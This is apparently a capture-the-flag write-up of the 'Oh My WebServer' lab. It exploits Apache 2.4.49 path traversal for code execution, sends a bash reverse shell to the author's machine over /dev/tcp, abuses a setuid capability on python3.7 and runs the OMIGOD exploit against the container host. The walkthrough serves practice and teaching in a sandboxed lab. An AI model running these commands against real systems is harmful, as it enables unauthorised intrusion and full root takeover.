CTF : Oh My WebServer

CTF Oh My WebServer writeup. Source THM. Announced difficulty level: Medium

Posted by Boula-Bytes on 12 May 2022

CTF : Oh_My_WebServer

Informations

  • IP: 10.10.65.235
  • MYIP: 10.8.98.126

First enumeration

Basics

  • NMAP
console
sudo nmap -p22,80 -A  10.10.65.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-12 20:58 CEST
Nmap scan report for 10.10.65.235
Host is up (0.065s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
|   256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_  256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-server-header: Apache/2.4.49 (Unix)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Consult - Business Consultancy Agency Template | Home
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%), Linux 2.6.32 - 3.1 (86%), Linux 2.6.39 - 3.2 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   37.48 ms 10.8.0.1
2   73.03 ms 10.10.65.235

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.69 seconds

Vulnerabilities search

In assets I found a Mac .DS_Store file but nothing interesting here. The contact form call a php page but the file is missing...

So nothing to do with the site it self, but is there known exploits ?

console
$ searchsploit apache 2.4.49
[...]
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)             | multiple/webapps/50383.sh
[...]

Maybe this one could do the trick ? Let's see...

console
$ bash 50383.sh target.txt /bin/sh whoami
http://10.10.65.235
daemon

hey ! It seems to work !

Exploit

So here we go !

On my box :

console
$ pwncat -l 1234
console
$ bash 50383.sh target.txt /bin/bash "/bin/bash -i >& /dev/tcp/10.8.98.126/1234 0>&1"

And we got a shell :)

$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Privilege escalation

Enumeration for privesc

Ok, it seems we are in a docker container... We need to escape from it or find something to enter the host.

After a long time enumerating I tried to get root and I found this : 

console
$ getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep

So I used it to escalate to docker's root :

console
$ /usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Then, we can read the flag in /root

But we still are in the docker. This container as an ip set to 172.17.0.2, so the host should have 172.17.0.1... maybe... let's see.

Ok there is no tool to help me. So I searched a static build of nmap version.

Then I used pwncat to upload it.

console
./nmap -p- 172.17.0.1
[...]
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown
[...]

Let's find what is port TCP/5986. This port is either use for winrm or omi. We assume that the host is a linux host. So it should be an omi linux agent. After some search there is CVE-2021-38647 (OMIGOD) which could lead to an RCE.

Let's try.

On my box :

console
$ wget https://raw.githubusercontent.com/horizon3ai/CVE-2021-38647/main/omigod.py

And then we upload it via pwncat.

Exploit

console
$ python3.7 omigod.py --target 172.17.0.1 -c "cat /root/root.txt"

\o/